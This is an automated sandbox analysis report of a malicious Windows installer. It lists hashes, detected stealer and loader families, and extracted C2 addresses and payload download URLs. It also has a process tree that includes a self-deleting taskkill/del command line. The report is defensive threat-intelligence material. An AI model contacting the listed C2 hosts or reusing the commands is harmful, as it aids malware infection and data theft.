Overview

overview

10

Static

static

setup_x86_...0).exe

windows7_x64

setup_x86_...0).exe

windows10_x64

setup_x86_...1).exe

windows7_x64

setup_x86_...1).exe

windows10_x64

setup_x86_...2).exe

windows7_x64

setup_x86_...2).exe

windows10_x64

setup_x86_...3).exe

windows7_x64

setup_x86_...3).exe

windows10_x64

setup_x86_...4).exe

windows7_x64

setup_x86_...4).exe

windows10_x64

setup_x86_...5).exe

windows7_x64

setup_x86_...5).exe

windows10_x64

setup_x86_...6).exe

windows7_x64

setup_x86_...6).exe

windows10_x64

setup_x86_...7).exe

windows7_x64

setup_x86_...7).exe

windows10_x64

setup_x86_...8).exe

windows7_x64

setup_x86_...8).exe

windows10_x64

setup_x86_...9).exe

windows7_x64

10

setup_x86_...9).exe

windows10_x64

setup_x86_...2).exe

windows7_x64

setup_x86_...2).exe

windows10_x64

10

setup_x86_...0).exe

windows7_x64

setup_x86_...0).exe

windows10_x64

10

setup_x86_...1).exe

windows7_x64

setup_x86_...1).exe

windows10_x64

10

setup_x86_...2).exe

windows7_x64

setup_x86_...2).exe

windows10_x64

setup_x86_...3).exe

windows7_x64

setup_x86_...3).exe

windows10_x64

10

setup_x86_...3).exe

windows7_x64

setup_x86_...3).exe

windows10_x64

10

Resubmissions

11-07-2024 05:43

240711-gej4lstgrf 10

06-09-2021 14:13

210906-rjpvrsedbm 10

08-07-2021 11:08

210708-4gztl3mwl6 10

08-07-2021 08:02

210708-klfb4qeda6 10

07-07-2021 09:39

210707-nem57xyvf2 10

06-07-2021 17:51

210706-7pcrmjy3fa 10

06-07-2021 13:45

210706-eybelwcq86 10

Analysis

  • max time kernel
    75s
  • max time network
    223s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    02-07-2021 07:35

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Remote task has failed: Machine shutdown
Report Analysis Logs

General

  • Target

    setup_x86_x64_install - копия (18).exe

  • Size

    3.2MB

  • MD5

    3ae1c212119919e5fce71247286f8e0e

  • SHA1

    97c1890ab73c539056f95eafede319df774e9d38

  • SHA256

    30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e

  • SHA512

    5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Score
10/10
cryptbotfickerstealergluptebametasploitplugxredlinesmokeloadervidarservaniaspackv2backdoordiscoverydropperevasioninfostealerloaderpersistencespywarestealertrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

fickerstealer

C2

game2030.site:80

Extracted

Family

cryptbot

C2

xeieib52.top

moraid05.top
Attributes
  • payload_url

    http://lopoga07.top/download.php?file=lv.exe

Signatures

  • CryptBot

    A C++ stealer distributed widely in bundle with other software.

    spywarestealercryptbot
  • CryptBot Payload 1 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

    trojanplugx
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

    infostealerfickerstealer
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 6 IoCs
    stealer
  • ASPack v2.12-2.42 14 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Downloads MZ/PE file
  • Executes dropped EXE 41 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies data under HKEY_USERS 30 IoCs
  • Modifies registry class 20 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:888
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:1816
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (18).exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (18).exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\setup_install.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1812
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c arnatic_2.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:652
            • C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_2.exe
              arnatic_2.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:1160
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c arnatic_3.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1624
            • C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_3.exe
              arnatic_3.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:276
              • C:\Windows\SysWOW64\rUNdlL32.eXe
                "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                6⤵
                • Loads dropped DLL
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1028
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c arnatic_4.exe
            4⤵
            • Loads dropped DLL
            PID:1840
            • C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_4.exe
              arnatic_4.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:880
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2124
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                6⤵
                • Executes dropped EXE
                PID:3012
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c arnatic_5.exe
            4⤵
            • Loads dropped DLL
            PID:428
            • C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_5.exe
              arnatic_5.exe
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              PID:1664
              • C:\Users\Admin\AppData\Roaming\2318569.exe
                "C:\Users\Admin\AppData\Roaming\2318569.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1980
              • C:\Users\Admin\AppData\Roaming\8259134.exe
                "C:\Users\Admin\AppData\Roaming\8259134.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                PID:956
                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:276
              • C:\Users\Admin\AppData\Roaming\7116366.exe
                "C:\Users\Admin\AppData\Roaming\7116366.exe"
                6⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:2008
              • C:\Users\Admin\AppData\Roaming\7535077.exe
                "C:\Users\Admin\AppData\Roaming\7535077.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:112
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c arnatic_6.exe
            4⤵
            • Loads dropped DLL
            PID:364
            • C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_6.exe
              arnatic_6.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:328
              • C:\Users\Admin\Documents\u9sSkAWH7e51wPTHO2tcFK2h.exe
                "C:\Users\Admin\Documents\u9sSkAWH7e51wPTHO2tcFK2h.exe"
                6⤵
                • Executes dropped EXE
                PID:2368
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im u9sSkAWH7e51wPTHO2tcFK2h.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\u9sSkAWH7e51wPTHO2tcFK2h.exe" & del C:\ProgramData\*.dll & exit
                  7⤵
                    PID:2348
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im u9sSkAWH7e51wPTHO2tcFK2h.exe /f
                      8⤵
                      • Kills process with taskkill
                      PID:2780
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      8⤵
                      • Delays execution with timeout.exe
                      PID:2124
                • C:\Users\Admin\Documents\ikwxZsQ9RtPkVtvuIulqGIDL.exe
                  "C:\Users\Admin\Documents\ikwxZsQ9RtPkVtvuIulqGIDL.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2388
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
                    7⤵
                      PID:2636
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef61f4f50,0x7fef61f4f60,0x7fef61f4f70
                        8⤵
                          PID:1476
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1224 /prefetch:2
                          8⤵
                            PID:2680
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1312 /prefetch:8
                            8⤵
                              PID:2712
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1784 /prefetch:8
                              8⤵
                                PID:2256
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1516 /prefetch:2
                                8⤵
                                  PID:1660
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2064 /prefetch:1
                                  8⤵
                                    PID:3096
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2056 /prefetch:1
                                    8⤵
                                      PID:3088
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2468 /prefetch:1
                                      8⤵
                                        PID:3164
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:1
                                        8⤵
                                          PID:3172
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2688 /prefetch:1
                                          8⤵
                                            PID:3192
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
                                            8⤵
                                              PID:3216
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3664 /prefetch:8
                                              8⤵
                                                PID:3400
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1968 /prefetch:8
                                                8⤵
                                                  PID:3596
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
                                                  8⤵
                                                    PID:3644
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
                                                    8⤵
                                                      PID:3688
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=976 /prefetch:8
                                                      8⤵
                                                        PID:1240
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
                                                        8⤵
                                                          PID:3344
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=584 /prefetch:8
                                                          8⤵
                                                            PID:3332
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:2948
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
                                                            8⤵
                                                              PID:3780
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3676 /prefetch:8
                                                              8⤵
                                                                PID:3844
                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                8⤵
                                                                  PID:3776
                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13f2ca890,0x13f2ca8a0,0x13f2ca8b0
                                                                    9⤵
                                                                      PID:3924
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1172 /prefetch:8
                                                                    8⤵
                                                                      PID:4044
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3076 /prefetch:8
                                                                      8⤵
                                                                        PID:3412
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2724 /prefetch:8
                                                                        8⤵
                                                                          PID:4088
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
                                                                          8⤵
                                                                            PID:3456
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4832 /prefetch:8
                                                                            8⤵
                                                                              PID:3460
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4828 /prefetch:8
                                                                              8⤵
                                                                                PID:3512
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4680 /prefetch:8
                                                                                8⤵
                                                                                  PID:3548
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4648 /prefetch:8
                                                                                  8⤵
                                                                                    PID:3004
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4624 /prefetch:8
                                                                                    8⤵
                                                                                      PID:4072
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4588 /prefetch:8
                                                                                      8⤵
                                                                                        PID:3584
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
                                                                                        8⤵
                                                                                          PID:1288
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3984 /prefetch:8
                                                                                          8⤵
                                                                                            PID:556
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3988 /prefetch:8
                                                                                            8⤵
                                                                                              PID:1364
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3684 /prefetch:8
                                                                                              8⤵
                                                                                                PID:3060
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4140 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:2144
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3108 /prefetch:8
                                                                                                  8⤵
                                                                                                    PID:2060
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3376 /prefetch:8
                                                                                                    8⤵
                                                                                                      PID:2084
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4696 /prefetch:8
                                                                                                      8⤵
                                                                                                        PID:552
